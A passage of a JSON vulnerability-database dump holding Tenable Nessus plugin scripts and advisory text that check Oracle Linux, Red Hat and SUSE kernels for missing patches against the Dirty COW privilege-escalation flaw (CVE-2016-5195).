value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/24\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5 / 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-5195\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2016-3634\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"2.6\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-2.6.39\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-2.6.39-400.286.3.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-debug-2.6.39\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-debug-2.6.39-400.286.3.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-debug-devel-2.6.39\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-debug-devel-2.6.39-400.286.3.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-devel-2.6.39\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-devel-2.6.39-400.286.3.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-doc-2.6.39\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-doc-2.6.39-400.286.3.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-firmware-2.6.39\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-firmware-2.6.39-400.286.3.el5uek\")) flag++;\n\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-2.6.39-400.286.3.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-debug-2.6.39-400.286.3.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-debug-devel-2.6.39-400.286.3.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-devel-2.6.39-400.286.3.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-doc-2.6.39-400.286.3.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-firmware-2.6.39-400.286.3.el6uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-01T02:09:07", "bulletinFamily": "scanner", "description": "An update for kernel is now available for Red Hat Enterprise Linux 6.2\nAdvanced Update Support.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* A race condition was found in the way the Linux kernel", "modified": "2020-05-02T00:00:00", "id": "REDHAT-RHSA-2016-2132.NASL", "href": "https://www.tenable.com/plugins/nessus/94462", "published": "2016-11-02T00:00:00", "title": "RHEL 6 : kernel (RHSA-2016:2132) (Dirty COW)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:2132. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94462);\n script_version(\"2.20\");\n script_cvs_date(\"Date: 2019/10/24 15:35:42\");\n\n script_cve_id(\"CVE-2016-5195\");\n script_xref(name:\"RHSA\", value:\"2016:2132\");\n script_xref(name:\"IAVA\", value:\"2016-A-0306\");\n\n script_name(english:\"RHEL 6 : kernel (RHSA-2016:2132) (Dirty COW)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for kernel is now available for Red Hat Enterprise Linux 6.2\nAdvanced Update Support.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* A race condition was found in the way the Linux kernel's memory\nsubsystem handled the copy-on-write (COW) breakage of private\nread-only memory mappings. An unprivileged, local user could use this\nflaw to gain write access to otherwise read-only memory mappings and\nthus increase their privileges on the system. (CVE-2016-5195,\nImportant)\n\nRed Hat would like to thank Phil Oester for reporting this issue.\n\nBug Fix(es) :\n\n* Previously, the BUG_ON() signal appeared in the fs_clear_inode()\nfunction where the nfs_have_writebacks() function reported a positive\nvalue for nfs_inode->npages. As a consequence, a kernel panic\noccurred. The provided patch performs a serialization by holding the\ninode i_lock over the check of PagePrivate and locking the request,\nwhich fixes this bug. (BZ#1365157)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2016:2132\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5195\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/02\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6\\.2([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.2\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-5195\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2016:2132\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:2132\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-2.6.32-220.68.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-debug-2.6.32-220.68.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-2.6.32-220.68.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-debug-devel-2.6.32-220.68.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-debuginfo-2.6.32-220.68.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-2.6.32-220.68.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-devel-2.6.32-220.68.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", reference:\"kernel-doc-2.6.32-220.68.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", reference:\"kernel-firmware-2.6.32-220.68.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-headers-2.6.32-220.68.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"perf-2.6.32-220.68.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"perf-debuginfo-2.6.32-220.68.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"python-perf-2.6.32-220.68.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-2.6.32-220.68.1.el6\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-debug / kernel-debug-debuginfo / kernel-debug-devel / etc\");\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-01T02:39:04", "bulletinFamily": "scanner", "description": "The SUSE Linux Enterprise 11 SP2 LTSS kernel was updated to fix one\nsecurity issue. This security bug was fixed :\n\n - CVE-2016-5195: Local privilege escalation using\n MAP_PRIVATE. It is reportedly exploited in the wild\n (bsc#1004418).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2020-05-02T00:00:00", "id": "SUSE_SU-2016-2596-1.NASL", "href": "https://www.tenable.com/plugins/nessus/94280", "published": "2016-10-26T00:00:00", "title": "SUSE SLES11 Security Update : kernel (SUSE-SU-2016:2596-1) (Dirty COW)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:2596-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94280);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/09/11 11:22:14\");\n\n script_cve_id(\"CVE-2016-5195\");\n script_xref(name:\"IAVA\", value:\"2016-A-0306\");\n\n script_name(english:\"SUSE SLES11 Security Update : kernel (SUSE-SU-2016:2596-1) (Dirty COW)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SUSE Linux Enterprise 11 SP2 LTSS kernel was updated to fix one\nsecurity issue. This security bug was fixed :\n\n - CVE-2016-5195: Local privilege escalation using\n MAP_PRIVATE. It is reportedly exploited in the wild\n (bsc#1004418).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1004418\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-5195/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20162596-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2b6aade1\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 11-SP2-LTSS:zypper in -t patch\nslessp2-kernel-source-12807=1\n\nSUSE Linux Enterprise Debuginfo 11-SP2:zypper in -t patch\ndbgsp2-kernel-source-12807=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-ec2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-ec2-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-ec2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-pae-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-pae-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-trace-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/26\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-ec2-3.0.101-0.7.44.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-ec2-base-3.0.101-0.7.44.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-ec2-devel-3.0.101-0.7.44.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-xen-3.0.101-0.7.44.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.0.101-0.7.44.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.0.101-0.7.44.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-pae-3.0.101-0.7.44.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-pae-base-3.0.101-0.7.44.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-pae-devel-3.0.101-0.7.44.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"s390x\", reference:\"kernel-default-man-3.0.101-0.7.44.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"kernel-default-3.0.101-0.7.44.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"kernel-default-base-3.0.101-0.7.44.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"kernel-default-devel-3.0.101-0.7.44.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"kernel-source-3.0.101-0.7.44.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"kernel-syms-3.0.101-0.7.44.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"kernel-trace-3.0.101-0.7.44.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"kernel-trace-base-3.0.101-0.7.44.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"kernel-trace-devel-3.0.101-0.7.44.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"i586\", reference:\"kernel-ec2-3.0.101-0.7.44.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"i586\", reference:\"kernel-ec2-base-3.0.101-0.7.44.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"i586\", reference:\"kernel-ec2-devel-3.0.101-0.7.44.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"i586\", reference:\"kernel-xen-3.0.101-0.7.44.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"i586\", reference:\"kernel-xen-base-3.0.101-0.7.44.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"i586\", reference:\"kernel-xen-devel-3.0.101-0.7.44.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"i586\", reference:\"kernel-pae-3.0.101-0.7.44.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"i586\", reference:\"kernel-pae-base-3.0.101-0.7.44.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"i586\", reference:\"kernel-pae-devel-3.0.101-0.7.44.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-01T02:39:08", "bulletinFamily": "scanner", "description": "This update for the Linux Kernel 3.12.60-52_54 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2016-5195: A local privilege escalation using\n MAP_PRIVATE was fixed, which is reportedly exploited in\n the wild (bsc#1004419).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as 